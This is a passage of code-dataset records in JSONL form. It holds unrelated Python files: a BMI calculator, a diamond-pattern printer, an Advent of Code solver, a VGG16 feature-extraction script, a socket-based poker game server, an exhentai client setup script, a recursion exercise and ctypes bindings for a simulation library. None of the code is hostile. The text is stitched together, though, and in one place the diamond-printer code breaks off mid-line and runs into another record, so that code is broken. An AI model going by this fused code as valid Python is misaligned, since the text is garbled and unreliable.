3)\n","sub_path":"decorator_s.py","file_name":"decorator_s.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"285622144","text":"val = 0\n\n\ndef bmi(masa, wzrost):\n val = round(masa/(wzrost*wzrost), 2)\n print ('Twój wskaźnik BMI wynosi ' + str(val) + '.')\n return val\n\n\nprint('Podaj wagę w kg')\nA=int(input())\n\nprint('Podaj wzrost w cm')\nB=int(input())/100\n\n\ndef komentarz(bmi):\n if bmi < 18.5:\n print('Niedowaga')\n elif bmi < 24.99:\n print('Norma')\n else:\n print('Nadwaga')\n\n\nkomentarz(bmi(A, B))\n","sub_path":"1bmi.py","file_name":"1bmi.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"42294293","text":"def ndiamond():\r\n\tn=5\r\n\tu=int(n/2)+1 #number of rows in the upper triangle\r\n\tl=int(n/2) #number of rows in the lower tirangle\r\n\tk=1\r\n\tfor i in range(u): #for the upper triangle\r\n\t\tk=1\r\n\t\tfor j in range(u-1-i): #printing spaces \r\n\t\t\tprint(\" \",end=\"\")\r\n\t\tfor j in range(2*i+1): #for printing the numbers 2n-1 times for the nth row n>=0\r\n\t\t\tprint(k,end=\"\") #now we print k which starts from 1 k increases untill i==j then it decreases\r\n\t\t\tif j= i[\"min\"]:\n valid += 1\n \n print(\"Part1\", valid)\n \ndef part2(input):\n valid = 0\n for i in input:\n index1, index2 = map(lambda n: n - 1, [i[\"min\"], i[\"max\"]])\n if (i[\"text\"][index1] == i[\"letter\"]) ^ (i[\"text\"][index2] == i[\"letter\"]):\n valid+= 1\n\n print(\"Part2\", valid)\n\n\nif __name__ == \"__main__\":\n f = open(file)\n input = []\n\n for line in f.readlines():\n rule, text = line.split(\":\")\n min, rest = rule.split(\"-\")\n max, letter = rest.split(\" \")\n input.append({\n \"min\": int(min),\n \"max\": int(max),\n \"letter\":letter,\n \"text\": text.strip()\n })\n\n part1(input)\n part2(input)\n \n","sub_path":"day02/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"51966499","text":"# -*- coding: utf-8 -*-\n\nglobal try_y_train\nglobal try_X_train\nglobal try_X_test\nglobal try_y_test \nimport argparse\nimport os\nimport time\n\nfrom PIL import Image\n\nimport numpy as np\n\nfrom sklearn.svm import LinearSVC\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.utils.data\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nimport torchvision\n\nmodels.vgg.model_urls[\"vgg16\"] = \"http://webia.lip6.fr/~robert/cours/rdfia/vgg16-397923af.pth\"\nos.environ[\"TORCH_MODEL_ZOO\"] = \"/tmp/torch\"\nPRINT_INTERVAL = 20\nCUDA = False\n\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self, keep_all=False):\n self.reset()\n self.data = None\n if keep_all:\n self.data = []\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n if self.data is not None:\n self.data.append(val)\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\n\n\ndef get_dataset(batch_size, path):\n \"\"\"\n Cette fonction charge le dataset et effectue des transformations sur chaqu\n \"\"\"\n train_dataset = datasets.ImageFolder(path+'/train',\n transform=transforms.Compose([ # TODO Pre-traitement a faire\n transforms.Lambda(lambda x: x.resize((224, 224,))),\n transforms.ToTensor(),\n transforms.Normalize((0.495, 0.456, 0.406,), (0.229, 0.224, 0.225,))\n ]))\n val_dataset = datasets.ImageFolder(path+'/test',\n transform=transforms.Compose([ # TODO Pre-traitement a faire\n transforms.Lambda(lambda x: x.resize((224, 224,))),\n transforms.ToTensor(),\n transforms.Normalize((0.495, 0.456, 0.406,), (0.229, 0.224, 0.225,))\n ]))\n\n train_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=batch_size, shuffle=False, pin_memory=CUDA, num_workers=2)\n val_loader = torch.utils.data.DataLoader(val_dataset,\n batch_size=batch_size, shuffle=False, pin_memory=CUDA, num_workers=2)\n\n return train_loader, val_loader\n\ndef epoch(data, model, criterion, optimizer=None):\n model.eval() if optimizer is None else model.train()\n\n t_X, t_y = [], []\n print(model)\n for i, (input, target) in enumerate(data):\n input = Variable(input)\n target = Variable(target)\n\n if CUDA:\n input = input.cuda()\n target = target.cuda()\n\n output = model.forward(input)\n loss = criterion(output, target)\n\n # backward si on est en \"train\"\n if optimizer:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n\n\n if i % PRINT_INTERVAL == 0:\n print('Batch {0:03d}/{1:03d}'.format(i, len(data)))\n # TODO Feature extraction a faire\n #print(input.data.shape)\n t_X.append(model.forward(input).data.cpu().numpy())\n t_y.append(target)\n\n\n print(\"accuracy: \", accuracy(output.data, target.data, topk=(1, 5)))\n # backward si on est en \"train\"\n if optimizer:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n\n return t_X, t_y\n\n\ndef main(params):\n print('Instanciation de VGG16')\n vgg16 = models.vgg16(pretrained=True)\n\n class VGG16relu7(nn.Module):\n def __init__(self):\n super(VGG16relu7, self).__init__()\n # recopier toute la partie convolutionnelle\n self.features = nn.Sequential(\n *list(vgg16.features.children()))\n # garder une partie du classifieur, -2 pour s’arreter a relu7\n # self.classifier = nn.Sequential(*list(vgg16.classifier.children())[:-2])\n\n self.classifier = nn.Sequential(\n nn.Linear(25088, 4096),\n nn.ReLU(), \n nn.Dropout(p=0.5),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Linear(4096, 10),\n nn.ReLU()\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.classifier(x)\n return x\n\n print('Instanciation de VGG16relu7')\n model = VGG16relu7() # TODO À remplacer pour feature extraction\n\n criterion = nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(model.parameters(), 0.01, momentum=0)#.9)\n\n # model = torchvision.models.squeezenet1_1(pretrained=True)\n model.eval()\n if CUDA: # si on fait du GPU, passage en CUDA\n model = model.cuda()\n\n # On récupère les données\n print('Récupération des données')\n train, test = get_dataset(params.batch_size, params.path)\n #train, test = Variable(train), Variable(test)\n\n # Extraction des features\n print('Feature extraction')\n for i in range(5):\n X_train, y_train = epoch(train, model, criterion, optimizer)\n X_test, y_test = epoch(test, model, criterion)\n\n\n # TODO Apprentissage et évaluation des SVM à faire\n print('Apprentissage des SVM')\n svm = LinearSVC(C=1.0)\n print(svm)\n print(type(X_train), type(y_train))\n y_train = [k.data.cpu().numpy() for k in y_train]\n y_test = [k.data.cpu().numpy() for k in y_test]\n\n try_y_train = y_train\n try_X_train = X_train\n try_X_test = X_test\n try_y_test = y_test\n\n\n X_train = np.concatenate(tuple([k for k in X_train]))\n y_train = np.concatenate(tuple([k for k in y_train]))\n X_test = np.concatenate(tuple([k for k in X_test]))\n y_test = np.concatenate(tuple([k for k in y_test]))\n print(X_train, y_train)\n print(X_train[-1].shape, y_train[-1].shape)\n svm.fit(X_train, y_train)\n accuracy = svm.score(X_test, y_test)\n print(\"accuracy:\", accuracy)\n\nif __name__ == '__main__':\n\n # Paramètres en ligne de commande\n parser = argparse.ArgumentParser()\n parser.add_argument('--path', default='15SceneData/', type=str, metavar='DIR', help='path to dataset')\n parser.add_argument('--batch-size', default=4, type=int, metavar='N', help='mini-batch size (default: 8)')\n parser.add_argument('--cuda', dest='cuda', action='store_false', help='activate GPU acceleration')\n\n args = parser.parse_args()\n if args.cuda:\n CUDA = True\n cudnn.benchmark = True\n else:\n CUDA = False\n print(CUDA)\n\n main(args)\n\n input(\"done\")\n","sub_path":"TME-code/TME_9/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"373839920","text":"import copy\nimport time\nimport json\nimport socket\nimport random\nfrom collections import defaultdict\nimport multiprocessing\nfrom multiprocessing import reduction\nfrom operator import itemgetter\nimport threading\nimport gevent\nimport gevent.monkey\ngevent.monkey.patch_all()\nimport gipc\n\nfrom utils import utils, hint, err\nfrom utils.logs import logger\nfrom utils.config import cfg\nfrom games.nolimitholdem.game import Game as holdem_game\nfrom database import rabbitmq, mysql\n\n\nclass Player():\n def __init__(self, sock, name=None):\n self.name = name\n self.sock = sock\n self.session = 0\n self.times = 0\n\n def update_session(self, money):\n self.times += 1\n self.session += money\n\n def print_session(self):\n print(f'{self.name} : {self.session} after {self.times} matchs, {self.session * 10 / self.times} mbb/g')\n\n def notify(self, data):\n utils.sendJson(self.sock, data)\n\n def recv(self):\n data = utils.recvJson(self.sock)\n return data\n \n def finish(self):\n try:\n self.sock.shutdown(socket.SHUT_RDWR)\n except Exception:\n pass\n self.sock.close()\n\n\nclass Game():\n def __init__(self, room_id, room_number, game_number, names, socks, db, observer_queue, room_end_queue, is_ai, save_db):\n self.room_id = room_id\n self.room_number = room_number\n self.game_number = game_number\n self.players = []\n self.observers = []\n for name, sock in zip(names, socks):\n self.players.append(Player(sock, name))\n self.db = db\n self.observer_queue = observer_queue\n self.room_end_queue = room_end_queue\n self.is_ai = is_ai\n self.save_db = save_db\n\n def retrive_observer(self):\n while self.observer_queue[self.room_id]:\n sock = self.observer_queue[self.room_id].pop(0)\n self.observers.append(Player(sock))\n\n def run(self):\n try:\n self.work()\n except Exception as e:\n logger.exception(e)\n self.tear_down(hint.unknown_error_info(repr(e)))\n \n def work(self):\n BUG = False\n if len(self.players) == 2 and not self.is_ai:\n BUG = False\n if BUG: \n pass\n else:\n random.shuffle(self.players)\n \n error_info = None\n self.record_game = holdem_game(self.room_number)\n for game_count in range(1, self.game_number + 1):\n self.gid = utils.gen_id()\n self.aid = utils.gen_id()\n if not self.is_ai or self.is_ai and game_count % self.room_number == 1:\n if BUG:\n self.record_player = self.record_game.game_init(game_count - 1)\n else:\n self.record_player = self.record_game.game_init()\n player_id = self.record_player\n self.game = copy.deepcopy(self.record_game)\n while not self.game.is_terminal():\n self.retrive_observer()\n self.notify_state()\n data = self.players[player_id].recv()\n if data is None or \"aid\" not in data:\n self.aid = utils.gen_id()\n else:\n self.aid = data[\"aid\"]\n if data is None:\n error_info = hint.disconnect_info(self.players[player_id].name)\n action = \"fold\"\n else:\n try:\n action = data[\"action\"] \n except Exception as e:\n error_info = hint.no_action_info(self.players[player_id].name)\n action = \"fold\"\n try:\n player_id = self.game.step(action)\n except err.InvalidActionError as e:\n error_info = hint.invalid_action_info(self.players[player_id].name, e.action)\n player_id = self.game.step(\"fold\")\n\n self.notify_state(last=True)\n self.notify_result()\n \n if self.save_db:\n self.save_data()\n \n if error_info is not None:\n self.tear_down(error_info)\n return\n \n for player in self.players:\n data = player.recv()\n if data is None:\n self.tear_down(hint.disconnect_info(player.name))\n return\n if data[\"info\"] != \"ready\":\n self.tear_down(hint.player_exit_info(player.name))\n return\n player = self.players.pop(0)\n self.players.append(player)\n\n self.tear_down(hint.play_compelete_info)\n \n def save_data(self):\n message = self.game.get_save_data()\n message['name'] = [p.name for p in self.players]\n message['position'] = [i for i in range(len(self.players))]\n message['room_id'] = self.room_id\n message[\"gid\"] = self.gid\n self.db.save(message)\n\n def tear_down(self, info=None):\n self.add_id(info)\n for player in [*self.players, *self.observers]:\n player.notify(info)\n for player in [*self.players, *self.observers]:\n player.finish()\n if info[\"info\"] != \"success\":\n logger.warning(\"room {}, {}\", self.room_id, info[\"text\"])\n self.room_end_queue.put(self.room_id)\n\n def add_id(self, state):\n state[\"gid\"] = self.gid\n state[\"aid\"] = self.aid\n\n def notify_state(self, last=False):\n for i, player in enumerate(self.players):\n state = self.game.get_state(i)\n self.add_id(state)\n for j, p in enumerate(self.players):\n state['players'][j]['name'] = p.name\n state['info'] = 'state'\n if last:\n state['action_position'] = -1\n player.notify(state)\n\n state = self.game.get_public_state()\n self.add_id(state)\n if last:\n state['action_position'] = -1\n state['info'] = 'state'\n for j, p in enumerate(self.players):\n state['players'][j]['name'] = p.name\n for observer in self.observers:\n observer.notify(state)\n \n def notify_result(self):\n for i, player in enumerate(self.players):\n state = self.game.get_payoff(i)\n self.add_id(state)\n state['info'] = 'result'\n for j, p in enumerate(self.players):\n state['players'][j]['name'] = p.name\n player.notify(state)\n player.update_session(state['players'][i]['win_money'])\n\n state = self.game.get_payoff()\n self.add_id(state)\n state['info'] = 'result'\n state['total_money'] = [p.session for p in self.players]\n state['times'] = [p.times for p in self.players]\n for j, p in enumerate(self.players):\n state['players'][j]['name'] = p.name\n for observer in self.observers:\n observer.notify(state)\n\ndef worker_main(socket_reader, data_reader, room_end_queue, db, observer_queue):\n while True:\n data = data_reader.get()\n if data[\"info\"] == \"room\":\n room_id, room_number, game_number, names, is_ai, save_db = data[\"data\"]\n socks = []\n for i in range(room_number):\n socket_reader.poll(None)\n sock = socket.fromfd(reduction.recv_handle(socket_reader), socket.AF_INET, socket.SOCK_STREAM)\n socks.append(sock)\n game = Game(room_id, room_number, game_number, names, socks, db, observer_queue, room_end_queue, is_ai, save_db)\n gevent.spawn(game.run)\n\n if data[\"info\"] == \"observer\":\n room_id = data[\"data\"][0]\n socket_reader.poll(None)\n sock = socket.fromfd(reduction.recv_handle(socket_reader), socket.AF_INET, socket.SOCK_STREAM)\n observer_queue[room_id].append(sock)\n\ndef worker_read(db):\n while True:\n gevent.sleep(0.5)\n db.save_data()\n\ndef worker(socket_reader, data_reader, room_end_queue):\n db = mysql.Mysql()\n observer_queue = defaultdict(list)\n tasks = [\n gevent.spawn(worker_main, socket_reader, data_reader, room_end_queue, db, observer_queue),\n gevent.spawn(worker_read, db),\n ]\n gevent.joinall(tasks)\n \nclass WorkerControler():\n def __init__(self, room_end_queue):\n self.socket_r, self.socket_w = multiprocessing.Pipe()\n self.data_r, self.data_w = gipc.pipe()\n self.p = gipc.start_process(target=worker, args=(self.socket_r, self.data_r, room_end_queue))\n\n def dispatch(self, room):\n self.data_w.put(dict(info=\"room\", data=[room.room_id, room.room_number, room.game_number, room.names, room.is_ai, room.save_db]))\n for sock in room.socks:\n reduction.send_handle(self.socket_w, sock.fileno(), self.p.pid)\n\n def dispatch_observer(self, sock, room_id):\n self.data_w.put(dict(info=\"observer\", data=[room_id]))\n reduction.send_handle(self.socket_w, sock.fileno(), self.p.pid)\n\nclass Room():\n def __init__(self, room_id, room_number, game_number, bots, control_id, is_ai, save_db):\n self.socks = []\n self.names = []\n self.room_number = room_number\n self.game_number = game_number\n self.room_id = room_id\n self.bots = bots\n self.notify_bot_done = False\n self.control_id = control_id\n self.is_ai = is_ai\n self.save_db = save_db\n\n def add_player(self, sock, name):\n self.socks.append(sock)\n self.names.append(name)\n \n def full(self):\n return len(self.socks) == self.room_number\n \n def notify_bots(self, supported_agent, rb):\n if self.notify_bot_done:\n return True, None\n self.notify_bot_done = True \n count = defaultdict(int)\n for bot in self.bots:\n if bot not in supported_agent:\n return False, bot\n for bot in self.bots:\n count[bot] += 1\n suffix = \"\" if count[bot] == 1 else str(count[bot] - 1) \n info = dict(\n room_id=self.room_id,\n room_number=self.room_number,\n game_number=self.game_number,\n bot_name=bot,\n bot_name_suffix=suffix,\n server=cfg[\"ext_server\"][\"host\"],\n port=cfg[\"ext_server\"][\"port\"],\n no_gpu=0\n )\n rb.send_msg_to_queue(bot, json.dumps(info))\n return True, None\n\n def dismiss(self, info):\n for sock in self.socks:\n if info is not None:\n utils.sendJson(sock, info)\n try:\n sock.shutdown(socket.SHUT_RDWR)\n except Exception:\n pass\n sock.close()\n\nclass Listener():\n def __init__(self, address, port, controlers, room_end_queue, agent_error_queue):\n self.s = socket.socket()\n self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.s.bind((address, port))\n self.s.listen(100)\n self.controlers = controlers\n self.rooms = {}\n self.cur_control = 0\n self.db = mysql.Mysql()\n self.rb = rabbitmq.Rabbitmq()\n self.room_end_queue = room_end_queue\n self.agent_error_queue = agent_error_queue\n self.supported_agent = self.db.agents\n\n def run(self):\n tasks = [\n gevent.spawn(self.clear_room),\n gevent.spawn(self.recv_user),\n gevent.spawn(self.update_agent_list)\n ]\n gevent.joinall(tasks)\n\n @utils.run_forever\n @utils.catch_exception\n def update_agent_list(self):\n self.db.update_agent()\n self.supported_agent = self.db.agents\n gevent.sleep(20)\n\n @utils.run_forever\n @utils.catch_exception\n def clear_room(self):\n while not self.room_end_queue.empty():\n room_id = self.room_end_queue.get()\n if room_id in self.rooms:\n del self.rooms[room_id]\n \n while not self.agent_error_queue.empty():\n msg = self.agent_error_queue.get()\n room_id = msg[\"room_id\"]\n bot_name = msg[\"bot_name\"]\n if room_id in self.rooms:\n self.rooms[room_id].dismiss(hint.no_enough_resource_info(bot_name))\n del self.rooms[room_id]\n gevent.sleep(1)\n\n @utils.run_forever\n @utils.catch_exception\n def recv_user(self):\n conn, addr = self.s.accept()\n logger.debug(\"accept user {}:{}\", addr[0], addr[1])\n if addr[0] != cfg[\"ext_server\"][\"host\"]:\n self.tear_down(conn)\n logger.warning(\"Strange connection!!!\")\n return\n gevent.spawn(self.recv_data_run, conn, addr)\n\n def recv_data_run(self, conn, addr):\n try:\n self.recv_data(conn, addr)\n except Exception as e:\n self.tear_down(conn, hint.unknown_error_info(repr(e)))\n logger.exception(e)\n\n def recv_data(self, conn, addr):\n logger.debug(\"Start Recving {} {}\".format(addr[0], addr[1]))\n data = utils.recvJson(conn)\n logger.info(\"{}:{}, {}\", addr[0], addr[1], data)\n info = itemgetter(\"info\")(data)\n \n if info == \"connect\":\n room_id, name, room_number, bots, game_number = itemgetter(\"room_id\", \"name\", \"room_number\", \"bots\", \"game_number\")(data)\n room_id = int(room_id)\n room = self.get_room(room_id, room_number, game_number, bots)\n if room.full():\n self.tear_down(conn, hint.room_full_info(room_id))\n return\n room.add_player(conn, name)\n succ, agent_name = room.notify_bots(self.supported_agent, self.rb)\n if not succ:\n self.tear_down(conn, hint.agent_not_found_info(agent_name))\n del self.rooms[room_id]\n return \n if room.full():\n self.controlers[room.control_id].dispatch(room)\n \n if info == \"observer\":\n room_id = int(itemgetter(\"room_id\")(data))\n if room_id not in self.rooms:\n self.tear_down(conn, hint.room_not_exist_info(room_id))\n return\n room = self.rooms[room_id]\n self.controlers[room.control_id].dispatch_observer(conn, room_id)\n\n if info == \"ai_vs_ai\":\n room_id, room_number, bots, game_number = itemgetter(\"room_id\", \"room_number\", \"bots\", \"game_number\")(data)\n room_id = int(room_id)\n room = self.get_room(room_id, room_number, game_number, bots, True)\n if room.full():\n self.tear_down(conn, hint.room_full_info(room_id))\n return\n succ, agent_name = room.notify_bots(self.supported_agent, self.rb)\n if not succ:\n self.tear_down(conn, hint.agent_not_found_info(agent_name))\n del self.rooms[room_id]\n return\n self.controlers[room.control_id].dispatch_observer(conn, room_id)\n \n def tear_down(self, conn, info=None):\n # logger.warning(info)\n if info is not None:\n utils.sendJson(conn, info)\n try:\n conn.shutdown(socket.SHUT_RDWR)\n except Exception:\n pass\n conn.close()\n\n def get_room(self, room_id, room_number, game_number, bots, is_ai=False, save_db=True):\n if room_id > 20000 or room_id < 5000:\n save_db = False\n if room_id not in self.rooms:\n self.rooms[room_id] = Room(room_id, room_number, game_number, bots, self.cur_control, is_ai, save_db)\n self.cur_control += 1\n self.cur_control %= len(self.controlers)\n return self.rooms[room_id]\n\nclass Receiver(multiprocessing.Process):\n def __init__(self, agent_error_queue):\n super().__init__()\n self.agent_error_queue = agent_error_queue\n self.rb = rabbitmq.Rabbitmq()\n self.rb.recv_msg_from_queue(\"agent_error_queue\", self.agent_error_call_back)\n \n def agent_error_call_back(self, ch, method, props, body):\n msg = json.loads(body)\n logger.info(msg)\n self.agent_error_queue.put(msg)\n \n def run(self):\n self.rb.start()\n \ndef main():\n room_end_queue = multiprocessing.Queue()\n controlers = [\n WorkerControler(room_end_queue)\n for i in range(cfg[\"num_workers\"])\n ]\n agent_error_queue = multiprocessing.Queue()\n\n listener = Listener(cfg[\"server\"][\"host\"], cfg[\"server\"][\"port\"], controlers, room_end_queue, agent_error_queue)\n Receiver(agent_error_queue).start()\n\n\n listener.run()\n \nif __name__ == '__main__':\n main()","sub_path":"multi_gev_server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":16795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"72114344","text":"#!/usr/bin/python\n\nimport sys\n\ndef frequentItemsets (outFileName, numVars):\n with open(outFileName, 'r') as outFile:\n itemsets = set()\n for line in outFile:\n items = [int(i) for i in line.split()]\n itemset = [-1] * numVars\n for var in range(numVars):\n if var in items:\n itemset[var] = 1\n else:\n itemset[var] = 2\n itemsets.add(tuple(itemset))\n return itemsets\n\ndef main():\n if len(sys.argv) != 3:\n print (\"Usage: {} [LCM_Output] [#items]\".format(sys.argv[0]))\n exit (1)\n numVars = int (sys.argv[2])\n fiList = frequentItemsets(sys.argv[1], numVars)\n print (\"number of items: {}\".format(numVars))\n for itemset in fiList:\n print (\"{}\".format(itemset))\n\nif __name__ == '__main__':\n main()\n","sub_path":"utils/CompareWithSampling/readLCMOutput.py","file_name":"readLCMOutput.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"111160779","text":"import json\nimport os\nimport shutil\n\nimport console\nimport dialogs\nimport ui\n\nfrom parse.exhentaiparser import renew, renew_account, ExhentaiParser\nfrom core.database import create_db\nfrom conf.config import CONFIGPATH, COOKIE_FILE\n\ndef is_suitable_device():\n a, b = ui.get_screen_size()\n if a == 1024 and b == 768 or b == 1024 and a == 768:\n return True\n \ndef init_config():\n if os.path.exists(CONFIGPATH):\n os.remove(CONFIGPATH)\n shutil.copy(CONFIGPATH + '.example', CONFIGPATH)\n \ndef get_favcat():\n parser = ExhentaiParser(\n cookies_dict=json.loads(open(COOKIE_FILE).read())\n )\n url = 'https://exhentai.org/favorites.php'\n t = parser.get_list_infos(url)\n with open(CONFIGPATH, encoding='utf-8') as f:\n config = json.loads(f.read())\n config['favcat_nums_titles'] = t['favcat_nums_titles']\n config['favorites_order_method'] = t['favorites_order_method']\n text = json.dumps(config, indent=2, sort_keys=True)\n with open(CONFIGPATH, 'w', encoding='utf-8') as f:\n f.write(text)\nipadpro_iphone_warning = \"未针对此设备调整UI\"\n\nchoices_list = [\n 'exhentai��啥?',\n '我有刚注册的e-hentai账号但还不能进入exhentai',\n '我有exhentai账号但没有Multi-Page Viewer的Hath Perk',\n '我有exhentai账号而且有Multi-Page Viewer的Hath Perk'\n ]\n \nmanual = [\n \"绅士的隐蔽乐园,请于表站e-hentai.org注册账号,刚注册账号不能访问exhentai.org,需要等待2星期左右\",\n \"刚注册账号不能访问exhentai.org,需要等待2星期左右\",\n \"请去https://e-hentai.org/hathperks.php点亮Multi-Page Viewer的Hath Perk,需要300Hath币或捐款100美元\"\n ]\n\ndef welcome():\n if not is_suitable_device():\n console.hud_alert(ipadpro_iphone_warning, 'error')\n t = dialogs.list_dialog(\n title=\"最符合你状况的描述是:\",\n items=choices_list,\n multiple=False)\n if t == choices_list[0]:\n console.alert(manual[0])\n elif t == choices_list[1]:\n console.alert(manual[1])\n elif t == choices_list[2]:\n console.alert(manual[2])\n elif t == choices_list[3]:\n username, password = console.login_alert('请输入账号密码')\n if username and password:\n renew_account(username, password)\n renew()\n init_config()\n create_db()\n get_favcat()\n \n \n","sub_path":"core/welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"504569189","text":"\"\"\"\n정수 n이 입력으로 들어오면 1부터 n까지의 합을 구하시오.\n\n\n입력\n입력으로 자연수 n이 입력된다. (1<=n<=10,000)\n\n출력\n1부터 n까지의 합을 출력한다.\n\n입력 예시\n100\n\n출력 예시\n5050\n\n\n\"\"\"\n\nimport sys\ninput = lambda : sys.stdin.readline().rstrip()\n\n\ndef recur1(k):\n if k==1:\n return 1\n else:\n return recur(k-1) + k # O(n)\n\n\ndef recur(k):\n if k==1:\n return 1\n else:\n return 2 * recur(k//2) + ((k+1)//2) * ((k+1)//2) # O(lgn)\n\nn = int(input())\n\nprint(recur(n))","sub_path":"코드업/재귀/codeup1905_1부터n까지합구하기.py","file_name":"codeup1905_1부터n까지합구하기.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"359956766","text":"\nfrom ctypes import *\n\n_library = None\n\n_possible_library_names = [\n 'butterfly.dll', # Generic Windows DLL\n './libbutterfly.so', # Local Linux SO\n './libbutterfly.dylib', # Local OS X dylib\n './butterfly.so', # Local Linux SO w/o prefix\n 'libbutterfly.so', # System Linux SO\n 'libbutterfly.dylib', # System OS X dylib\n 'butterflyso' # System Linux SO w/o prefix\n]\nfor name in _possible_library_names:\n try:\n _library = CDLL(name)\n break\n except OSError:\n continue\n\nif _library is None:\n raise RuntimeError(\"butterfly library cannot be loaded.\")\n\nNARGS = 5\nMAX_QUERY_RET = 2\n\nclass _bf_farm(Structure):\n _fields_ = [(\"spots\", POINTER(c_int)),\n (\"width\", c_int),\n (\"height\", c_int),\n (\"seed\", c_int),\n (\"last_dangerous\", c_int),\n (\"max_cancels\", c_int),\n\n (\"is_init\", c_int),\n (\"rng_state\", c_void_p),\n (\"safe_spots\", c_void_p),\n (\"dangerous_spots\", c_void_p),\n (\"butterfly\", c_void_p),\n (\"error\", c_int)]\n\nclass _bf_instinct(Structure):\n _fields_ = [(\"action\", c_int),\n (\"args\", c_int * NARGS)]\n\nclass _bf_config(Structure):\n _fields_ = [(\"cancel_on_looking_at_safe\", c_int),\n (\"cancel_on_looking_at_safe_neighbor_4p\", c_int),\n (\"cancel_on_looking_at_safe_neighbor_4x\", c_int),\n (\"cancel_on_looking_at_safe_neighbor_8\", c_int),\n (\"cancel_on_looking_outside_farm\", c_int),\n (\"look_method\", c_int),\n (\"enable_neighbor_look_8\", c_int),\n (\"neighbor_look_8\", c_int),\n (\"enable_neighbor_look_4\", c_int),\n (\"neighbor_look_4\", c_int)]\n\n_library.bf_spawn.argtypes = [POINTER(_bf_farm), POINTER(_bf_instinct), c_size_t, POINTER(_bf_config)]\n_library.bf_spawn.restype = c_int\n_library.bf_commit.argtypes = [POINTER(_bf_farm)]\n_library.bf_random.argtypes = [POINTER(_bf_farm)]\n_library.bf_random.restype = c_double\n_library.bf_query.argtypes = [POINTER(_bf_farm), c_int, POINTER(c_int)]\n_library.bf_cleanup.argtypes = [POINTER(_bf_farm)]\n\nMORPH_AT_LAST_DEATH_SPOT,\\\nMORPH_AT_LAST_MORPH_SPOT,\\\nMORPH_AT_FIXED_SPOT,\\\nMORPH_AT_RANDOM_SPOT,\\\nMORPH_AT_RANDOM_SAFE_SPOT,\\\nMORPH_AT_RANDOM_DANGEROUS_SPOT,\\\nMORPH_AT_RANDOM_WEST_SPOT,\\\nMORPH_AT_RANDOM_EAST_SPOT,\\\nMORPH_AT_RANDOM_NORTH_SPOT,\\\nMORPH_AT_RANDOM_SOUTH_SPOT,\\\nMORPH_AT_RANDOM_WEST_EDGE_SPOT,\\\nMORPH_AT_RANDOM_EAST_EDGE_SPOT,\\\nMORPH_AT_RANDOM_NORTH_EDGE_SPOT,\\\nMORPH_AT_RANDOM_SOUTH_EDGE_SPOT,\\\nMORPH_AT_RANDOM_WESTEAST_EDGE_SPOT,\\\nMORPH_AT_RANDOM_NORTHSOUTH_EDGE_SPOT,\\\nMORPH_AT_RANDOM_EDGE_SPOT,\\\nGOAL_FIXED_SPOT,\\\nGOAL_RANDOM_SPOT,\\\nGOAL_RANDOM_SAFE_SPOT,\\\nGOAL_RANDOM_DANGEROUS_SPOT,\\\nGOAL_RANDOM_WEST_SPOT,\\\nGOAL_RANDOM_EAST_SPOT,\\\nGOAL_RANDOM_NORTH_SPOT,\\\nGOAL_RANDOM_SOUTH_SPOT,\\\nGOAL_RANDOM_WEST_EDGE_SPOT,\\\nGOAL_RANDOM_EAST_EDGE_SPOT,\\\nGOAL_RANDOM_NORTH_EDGE_SPOT,\\\nGOAL_RANDOM_SOUTH_EDGE_SPOT,\\\nGOAL_RANDOM_WESTEAST_EDGE_SPOT,\\\nGOAL_RANDOM_NORTHSOUTH_EDGE_SPOT,\\\nGOAL_RANDOM_EDGE_SPOT,\\\nFLUTTER_STILL,\\\nFLUTTER_WEIGHTED_4,\\\nFLUTTER_WEIGHTED_8,\\\nFLUTTER_TUNNEL,\\\nFLUTTER_LINE,\\\nLOOK_NOWHERE,\\\nLOOK_EVERYWHERE,\\\nLOOK_1_AREA,\\\nLOOK_PLUS_AREA,\\\nLOOK_BIG_PLUS_AREA,\\\nLOOK_X_AREA,\\\nLOOK_BIG_X_AREA,\\\nLOOK_RECT_AREA,\\\nLOOK_SHRINKING_RECT_AREA,\\\nLOOK_CIRCLE_AREA,\\